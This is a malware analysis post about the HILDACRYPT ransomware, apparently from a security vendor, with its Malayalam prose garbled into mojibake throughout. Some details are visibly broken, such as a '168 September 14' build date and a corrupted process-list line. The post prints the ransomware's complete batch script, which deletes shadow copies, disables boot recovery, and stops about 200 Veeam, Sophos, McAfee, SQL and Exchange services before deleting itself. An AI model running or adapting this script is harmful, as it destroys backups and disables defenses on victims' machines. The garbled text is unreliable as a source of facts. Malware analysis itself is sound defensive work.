HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

เดนเดฒเต‹, เดนเดฌเตเตผ! Ransomware เดตเดฟเดญเดพเด—เดคเตเดคเดฟเตฝ เดจเดฟเดจเตเดจเตเดณเตเดณ เด•เตเดทเตเดฆเตเดฐเดตเต†เดฏเดฑเดฟเดจเตเดฑเต† เดเดฑเตเดฑเดตเตเด‚ เดชเตเดคเดฟเดฏ เดชเดคเดฟเดชเตเดชเตเด•เดณเต†เด•เตเด•เตเดฑเดฟเดšเตเดšเดพเดฃเต เดžเด™เตเด™เตพ เดตเต€เดฃเตเดŸเตเด‚ เดธเด‚เดธเดพเดฐเดฟเด•เตเด•เตเดจเตเดจเดคเต. 2019 เด“เด—เดธเตเดฑเตเดฑเดฟเตฝ เด•เดฃเตเดŸเต†เดคเตเดคเดฟเดฏ เดนเดฟเตฝเดก เด•เตเดŸเตเด‚เดฌเดคเตเดคเดฟเดฒเต† เด…เด‚เด—เดฎเดพเดฏ เด’เดฐเต เดชเตเดคเดฟเดฏ ransomware เด†เดฃเต HILDACRYPT, เดธเต‹เดซเตเดฑเตเดฑเตโ€Œเดตเต†เดฏเตผ เดตเดฟเดคเดฐเดฃเด‚ เดšเต†เดฏเตเดฏเดพเตป เด‰เดชเดฏเต‹เด—เดฟเดšเตเดš เดจเต†เดฑเตเดฑเตเดซเตเดฒเดฟเด•เตเดธเต เด•เดพเตผเดŸเตเดŸเต‚เดฃเดฟเดจเตเดฑเต† เดชเต‡เดฐเดฟเดฒเดพเดฃเต เด‡เดคเต เด…เดฑเดฟเดฏเดชเตเดชเต†เดŸเตเดจเตเดจเดคเต. เด‡เดจเตเดจเต เดจเดฎเตเดฎเตพ เดˆ เด…เดชเตเดกเต‡เดฑเตเดฑเต เดšเต†เดฏเตเดค ransomware เดตเตˆเดฑเดธเดฟเดจเตเดฑเต† เดธเดพเด™เตเด•เต‡เดคเดฟเด• เดธเดตเดฟเดถเต‡เดทเดคเด•เตพ เดชเดฐเดฟเดšเดฏเดชเตเดชเต†เดŸเตเด•เดฏเดพเดฃเต.

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

เดนเดฟเตฝเดก ransomware-เดจเตเดฑเต† เด†เดฆเตเดฏ เดชเดคเดฟเดชเตเดชเดฟเตฝ, Youtube-เตฝ เดชเต‹เดธเตเดฑเตเดฑเตเดšเต†เดฏเตเดค เด’เดจเตเดจเดฟเดฒเต‡เด•เตเด•เตเดณเตเดณ เดฒเดฟเด™เตเด•เต เดŸเตเดฐเต†เดฏเดฟเดฒเตผ เดฎเต‹เดšเดจเดฆเตเดฐเดตเตเดฏเดคเตเดคเดฟเตฝ เด•เดพเตผเดŸเตเดŸเต‚เตบ เดชเดฐเดฎเตเดชเดฐ เด‰เดฃเตเดŸเดพเดฏเดฟเดฐเตเดจเตเดจเต. HILDACRYPT เด’เดฐเต เดจเดฟเดฏเดฎเดพเดจเตเดธเตƒเดค XAMPP เด‡เตปเดธเตเดฑเตเดฑเดพเดณเดฑเดพเดฏเดฟ เดฎเดพเดฑเตเดจเตเดจเต, เดฎเดฐเดฟเดฏเดพเดกเดฟเดฌเดฟ, เดชเดฟเดŽเดšเตเดšเตเดชเดฟ, เดชเต‡เตพ เดŽเดจเตเดจเดฟเดต เด‰เตพเดชเตเดชเต†เดŸเตเดจเตเดจ เดŽเดณเตเดชเตเดชเดคเตเดคเดฟเตฝ เด‡เตปเดธเตเดฑเตเดฑเดพเตพ เดšเต†เดฏเตเดฏเดพเดตเตเดจเตเดจ เด…เดชเตเดชเดพเดšเตเดšเต† เดตเดฟเดคเดฐเดฃเดฎเดพเดฃเต. เด…เดคเต‡ เดธเดฎเดฏเด‚, เด•เตเดฐเดฟเดชเตโ€Œเดฑเตเดฑเต‹เดฒเต‹เด•เตเด•เดฑเดฟเดจเต เดฎเดฑเตเดฑเตŠเดฐเต เดซเดฏเตฝ เดจเดพเดฎเดฎเตเดฃเตเดŸเต - xamp. เด•เต‚เดŸเดพเดคเต†, ransomware เดซเดฏเดฒเดฟเดจเต เด’เดฐเต เด‡เดฒเด•เตเดŸเตเดฐเต‹เดฃเดฟเด•เต เดธเดฟเด—เตเดจเต‡เดšเตเดšเตผ เด‡เดฒเตเดฒ.

เดธเตเดฑเตเดฑเดพเดฑเตเดฑเดฟเด•เต เดตเดฟเดถเด•เดฒเดจเด‚

MS Windows-เดจเดพเดฏเดฟ เดŽเดดเตเดคเดฟเดฏ PE32 .NET เดซเดฏเดฒเดฟเดฒเดพเดฃเต ransomware เด…เดŸเด™เตเด™เดฟเดฏเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเดคเต. เด‡เดคเดฟเดจเตเดฑเต† เดตเดฒเดฟเดชเตเดชเด‚ 135 เดฌเตˆเดฑเตเดฑเตเด•เตพ เด†เดฃเต. เดชเตเดฐเดงเดพเดจ เดชเตเดฐเต‹เด—เตเดฐเดพเด‚ เด•เต‹เดกเตเด‚ เดกเดฟเดซเตปเดกเตผ เดชเตเดฐเต‹เด—เตเดฐเดพเด‚ เด•เต‹เดกเตเด‚ C# เตฝ เดŽเดดเตเดคเดฟเดฏเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเต. เดธเดฎเดพเดนเดฐเดฟเดšเตเดš เดคเต€เดฏเดคเดฟเดฏเตเด‚ เดธเดฎเดฏ เดธเตเดฑเตเดฑเดพเดฎเตเดชเตเด‚ เด…เดจเตเดธเดฐเดฟเดšเตเดšเต, เดฌเตˆเดจเดฑเดฟ เดธเตƒเดทเตเดŸเดฟเดšเตเดšเดคเต 168 เดธเต†เดชเตเดฑเตเดฑเด‚เดฌเตผ 14-เดจเดพเดฃเต.

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

เดกเดฟเดฑเตเดฑเด•เตเดฑเตเดฑเต เด‡เดฑเตเดฑเต เดˆเดธเดฟ เดชเตเดฐเด•เดพเดฐเด‚, เด•เตบเดซเตเดฏเต‚เดธเดฑเตเด‚ เด•เตบเดซเตเดฏเต‚เดธเตผเดŽเด•เตเดธเตเด‚ เด‰เดชเดฏเต‹เด—เดฟเดšเตเดšเดพเดฃเต ransomware เด†เตผเด•เตเด•เตˆเดตเต เดšเต†เดฏเตเดคเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเดคเต, เดŽเดจเตเดจเดพเตฝ เดˆ obfuscators เดฎเตเดฎเตเดชเดคเตเดคเต† เดชเต‹เดฒเต† เดคเดจเตเดจเต†เดฏเดพเดฃเต, ConfuserEx เดฎเดพเดคเตเดฐเดฎเดพเดฃเต เด•เตบเดซเตเดฏเต‚เดธเดฑเดฟเดจเตเดฑเต† เดชเดฟเตปเด—เดพเดฎเดฟ, เด…เดคเดฟเดจเดพเตฝ เด…เดตเดฏเตเดŸเต† เด•เต‹เดกเต เด’เดชเตเดชเตเด•เตพ เดธเดฎเดพเดจเดฎเดพเดฃเต.

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

HILDACRYPT เดคเต€เตผเดšเตเดšเดฏเดพเดฏเตเด‚ ConfuserEx-เดจเตŠเดชเตเดชเด‚ เดชเดพเด•เตเด•เต‡เดœเตเดšเต†เดฏเตเดคเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเต.

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

เด†เด•เตเดฐเดฎเดฃ เดตเต†เด•เตเดฑเตเดฑเตผ

เดฎเดฟเด•เตเด•เดตเดพเดฑเตเด‚, เด’เดฐเต เดจเดฟเดฏเดฎเดพเดจเตเดธเตƒเดค XAMPP เดชเตเดฐเต‹เด—เตเดฐเดพเดฎเดพเดฏเดฟ เดฎเตเด–เด‚เดฎเต‚เดŸเดฟเดฏเดฃเดฟเดžเตเดžเต, เดตเต†เดฌเต เดชเตเดฐเต‹เด—เตเดฐเดพเดฎเดฟเด‚เด—เต เดธเตˆเดฑเตเดฑเตเด•เดณเดฟเดฒเตŠเดจเตเดจเดฟเตฝ ransomware เด•เดฃเตเดŸเต†เดคเตเดคเดฟ.

เด…เดฃเตเดฌเดพเดงเดฏเตเดŸเต† เดฎเตเดดเตเดตเตป เดถเตƒเด‚เด–เดฒเดฏเตเด‚ เด•เดพเดฃเดพเตป เด•เดดเดฟเดฏเตเด‚ app.any.run sandbox.

เด…เดตเตเดฏเด•เตเดคเดค

ransomware เดธเตเดŸเตเดฐเดฟเด‚เด—เตเด•เตพ เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดค เดฐเต‚เดชเดคเตเดคเดฟเดฒเดพเดฃเต เดธเต‚เด•เตเดทเดฟเดšเตเดšเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเดคเต. เดธเดฎเดพเดฐเด‚เดญเดฟเด•เตเด•เตเดฎเตเดชเต‹เตพ, HILDACRYPT เด…เดตเดฏเต† Base64, AES-256-CBC เดŽเดจเตเดจเดฟเดต เด‰เดชเดฏเต‹เด—เดฟเดšเตเดšเต เดกเต€เด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดฏเตเดจเตเดจเต.

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

เด‡เตปเดธเตเดฑเตเดฑเดฒเต‡เดทเตป

เด’เดจเตเดจเดพเดฎเดคเดพเดฏเดฟ, ransomware %AppDataRoaming%-เตฝ เด’เดฐเต เดซเต‹เตพเดกเตผ เดธเตƒเดทเตเดŸเดฟเด•เตเด•เตเดจเตเดจเต, เด…เดคเดฟเตฝ GUID (เด†เด—เต‹เดณเดฎเดพเดฏเดฟ เดฏเตเดฃเต€เด•เตเด•เต เดเดกเดจเตเดฑเดฟเดซเดฏเตผ) เดชเดพเดฐเดพเดฎเต€เดฑเตเดฑเตผ เด•เตเดฐเดฎเดฐเดนเดฟเดคเดฎเดพเดฏเดฟ เดœเดจเดฑเต‡เดฑเตเดฑเตเดšเต†เดฏเตเดฏเตเดจเตเดจเต. เดˆ เดฒเตŠเด•เตเด•เต‡เดทเดจเดฟเดฒเต‡เด•เตเด•เต เด’เดฐเต เดฌเดพเดฑเตเดฑเต เดซเดฏเตฝ เดšเต‡เตผเด•เตเด•เตเดจเตเดจเดคเดฟเดฒเต‚เดŸเต†, ransomware เดตเตˆเดฑเดธเต cmd.exe เด‰เดชเดฏเต‹เด—เดฟเดšเตเดšเต เด…เดคเต เดธเดฎเดพเดฐเด‚เดญเดฟเด•เตเด•เตเดจเตเดจเต:

cmd.exe /c JKfgkgj3hjgfhjka.bat & เดŽเด•เตเดธเดฟเดฑเตเดฑเต

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเตHILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต
เด…เดคเต เดชเดฟเดจเตเดจเต€เดŸเต เดธเดฟเดธเตเดฑเตเดฑเด‚ เดซเต€เดšเตเดšเดฑเตเด•เดณเต‹ เดธเต‡เดตเดจเด™เตเด™เดณเต‹ เดชเตเดฐเดตเตผเดคเตเดคเดจเดฐเดนเดฟเดคเดฎเดพเด•เตเด•เดพเตป เด’เดฐเต เดฌเดพเดšเตเดšเต เดธเตเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดŽเด•เตเดธเดฟเด•เตเดฏเต‚เดŸเตเดŸเต เดšเต†เดฏเตเดฏเดพเตป เดคเตเดŸเด™เตเด™เตเดจเตเดจเต.

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

เดทเดพเดกเต‹ เดชเด•เตผเดชเตเดชเตเด•เตพ เดจเดถเดฟเดชเตเดชเดฟเด•เตเด•เตเดจเตเดจ, SQL เดธเต†เตผเดตเตผ เดชเตเดฐเดตเตผเดคเตเดคเดจเดฐเดนเดฟเดคเดฎเดพเด•เตเด•เตเดจเตเดจ, เดฌเดพเด•เตเด•เดชเตเดชเต, เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เตพ เดŽเดจเตเดจเดฟเดตเดฏเตเด•เตเด•เตเดณเตเดณ เด•เดฎเดพเตปเดกเตเด•เดณเตเดŸเต† เด’เดฐเต เดจเต€เดฃเตเดŸ เดฒเดฟเดธเตเดฑเตเดฑเต เดธเตเด•เตเดฐเดฟเดชเตเดฑเตเดฑเดฟเตฝ เด…เดŸเด™เตเด™เดฟเดฏเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเต.

เด‰เดฆเดพเดนเดฐเดฃเดคเตเดคเดฟเดจเต, เด…เด•เตเดฐเต‹เดฃเดฟเดธเต เดฌเดพเด•เตเด•เดชเตเดชเต เดธเต‡เดตเดจเด™เตเด™เตพ เดจเดฟเตผเดคเตเดคเดพเตป เด‡เดคเต เดชเดฐเดพเดœเดฏเดชเตเดชเต†เดŸเตเดŸเต. เด•เต‚เดŸเดพเดคเต†, เด‡เดจเดฟเดชเตเดชเดฑเดฏเตเดจเตเดจ เดตเต†เดฃเตเดŸเตผเดฎเดพเดฐเดฟเตฝ เดจเดฟเดจเตเดจเตเดณเตเดณ เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เด‡เดคเต เด†เด•เตเดฐเดฎเดฟเด•เตเด•เตเดจเตเดจเต: เดตเต€เด‚, เดธเต‹เดซเต‹เดธเต, เด•เดพเดธเตโ€Œเดชเต†เตผเดธเตโ€Œเด•เดฟ, เดฎเด•เตเด•เดพเดซเต€ เดŽเดจเตเดจเดฟเดตเดฏเตเด‚ เดฎเดฑเตเดฑเตเดณเตเดณเดตเดฏเตเด‚.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop โ€œSophos Device Control Serviceโ€ /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop โ€œZoolz 2 Serviceโ€ /y
net stop McTaskManager /y
net stop โ€œSophos AutoUpdate Serviceโ€ /y
net stop โ€œSophos System Protection Serviceโ€ /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop โ€œSymantec System Recoveryโ€ /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop โ€œSophos Health Serviceโ€ /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop โ€œSophos Message Routerโ€ /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop โ€œSophos Clean Serviceโ€ /y
net stop swi_update_64 /y
net stop โ€œSophos Web Control Serviceโ€ /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop โ€œVeeam Backup Catalog Data Serviceโ€ /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop โ€œSophos MCS Clientโ€ /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop โ€œSQLsafe Backup Serviceโ€ /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop โ€œSophos Safestore Serviceโ€ /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop โ€œSophos File Scanner Serviceโ€ /y
net stop โ€œSophos Agentโ€ /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop โ€œEnterprise Client Serviceโ€ /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop โ€œSQL Backupsโ€ /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop โ€œSophos MCS Agentโ€ /y
net stop RESvc /y
net stop โ€œAcronis VSS Providerโ€ /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop โ€œSQLsafe Filter Serviceโ€ /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

เดฎเตเด•เดณเดฟเตฝ เดธเต‚เดšเดฟเดชเตเดชเดฟเดšเตเดš เดธเต‡เดตเดจเด™เตเด™เดณเตเด‚ เดชเตเดฐเด•เตเดฐเดฟเดฏเด•เดณเตเด‚ เดชเตเดฐเดตเตผเดคเตเดคเดจเดฐเดนเดฟเดคเดฎเดพเด•เตเด•เดฟเดฏเดพเตฝ, เด†เดตเดถเตเดฏเดฎเดพเดฏ เดŽเดฒเตเดฒเดพ เดธเต‡เดตเดจเด™เตเด™เดณเตเด‚ เดชเตเดฐเดตเตผเดคเตเดคเดจเดฐเดนเดฟเดคเดฎเดพเดฃเต†เดจเตเดจเต เด‰เดฑเดชเตเดชเดพเด•เตเด•เดพเตป เดŸเดพเดธเตโ€Œเด•เตโ€Œเดฒเดฟเดธเตเดฑเตเดฑเต เด•เดฎเดพเตปเดกเต เด‰เดชเดฏเต‹เด—เดฟเดšเตเดšเต เดชเตเดฐเดตเตผเดคเตเดคเดฟเด•เตเด•เตเดจเตเดจ เดŽเดฒเตเดฒเดพ เดชเตเดฐเด•เตเดฐเดฟเดฏเด•เดณเต†เดฏเตเด‚ เด•เตเดฑเดฟเดšเตเดšเตเดณเตเดณ เดตเดฟเดตเดฐเด™เตเด™เตพ เด•เตเดฐเดฟเดชเตโ€Œเดฑเตเดฑเต‹เดฒเต‹เด•เตเด•เตผ เดถเต‡เด–เดฐเดฟเด•เตเด•เตเดจเตเดจเต.
เดŸเดพเดธเตโ€Œเด•เตโ€Œเดฒเดฟเดธเตเดฑเตเดฑเต v/fo csv

เดˆ เด•เดฎเดพเตปเดกเต เดชเตเดฐเดตเตผเดคเตเดคเดฟเด•เตเด•เตเดจเตเดจ เดชเตเดฐเด•เตเดฐเดฟเดฏเด•เดณเตเดŸเต† เดตเดฟเดถเดฆเดฎเดพเดฏ เดฒเดฟเดธเตเดฑเตเดฑเต เดชเตเดฐเดฆเตผเดถเดฟเดชเตเดชเดฟเด•เตเด•เตเดจเตเดจเต, เด…เดตเดฏเตเดŸเต† เด˜เดŸเด•เด™เตเด™เตพ "" เดšเดฟเดนเตเดจเดคเตเดคเดพเตฝ เดตเต‡เตผเดคเดฟเดฐเดฟเดšเตเดšเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเต.
ยซยซcsrss.exeยป,ยซ448ยป,ยซservicesยป,ยซ0ยป,ยซ1๏ฟฝ896 ๏ฟฝ๏ฟฝยป,ยซunknownยป,ยป๏ฟฝ/๏ฟฝยป,ยซ0:00:03ยป,ยป๏ฟฝ/๏ฟฝยปยป

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

เดˆ เดชเดฐเดฟเดถเต‹เดงเดจเดฏเตเด•เตเด•เต เดถเต‡เดทเด‚, ransomware เดŽเตปเด•เตเดฐเดฟเดชเตเดทเตป เดชเตเดฐเด•เตเดฐเดฟเดฏ เด†เดฐเด‚เดญเดฟเด•เตเด•เตเดจเตเดจเต.

เดŽเตปเด•เตเดฐเดฟเดชเตเดทเตป

เดซเดฏเตฝ เดŽเตปเด•เตเดฐเดฟเดชเตเดทเตป

HILDACRYPT, Recycle.Bin, Reference AssembliesMicrosoft เดซเต‹เตพเดกเดฑเตเด•เตพ เด’เดดเดฟเด•เต†เดฏเตเดณเตเดณ เดนเดพเตผเดกเต เดกเตเดฐเตˆเดตเตเด•เดณเดฟเตฝ เด•เดฃเตเดŸเต†เดคเตเดคเดฟเดฏ เดŽเดฒเตเดฒเดพ เด‰เดณเตเดณเดŸเด•เตเด•เด™เตเด™เดณเดฟเดฒเต‚เดŸเต†เดฏเตเด‚ เด•เดŸเดจเตเดจเตเดชเต‹เด•เตเดจเตเดจเต. ransomware-เดจเตเดฑเต† เดชเตเดฐเดตเตผเดคเตเดคเดจเดคเตเดคเต† เดฌเดพเดงเดฟเดšเตเดšเต‡เด•เตเด•เดพเดตเตเดจเตเดจ .Net เด†เดชเตเดฒเดฟเด•เตเด•เต‡เดทเดจเตเด•เตพเด•เตเด•เดพเดฏเตเดณเตเดณ เดจเดฟเตผเดฃเดพเดฏเด•เดฎเดพเดฏ dll, pdb เดฎเตเดคเดฒเดพเดฏเดต เดซเดฏเดฒเตเด•เตพ เดฐเดฃเตเดŸเดพเดฎเดคเตเดคเต‡เดคเดฟเตฝ เด…เดŸเด™เตเด™เดฟเดฏเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเต. เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดฏเดชเตเดชเต†เดŸเตเดจเตเดจ เดซเดฏเดฒเตเด•เตพเด•เตเด•เดพเดฏเดฟ เดคเดฟเดฐเดฏเดพเตป, เด‡เดจเดฟเดชเตเดชเดฑเดฏเตเดจเตเดจ เดตเดฟเดชเตเดฒเต€เด•เดฐเดฃเด™เตเด™เดณเตเดŸเต† เดฒเดฟเดธเตเดฑเตเดฑเต เด‰เดชเดฏเต‹เด—เดฟเด•เตเด•เตเดจเตเดจเต:

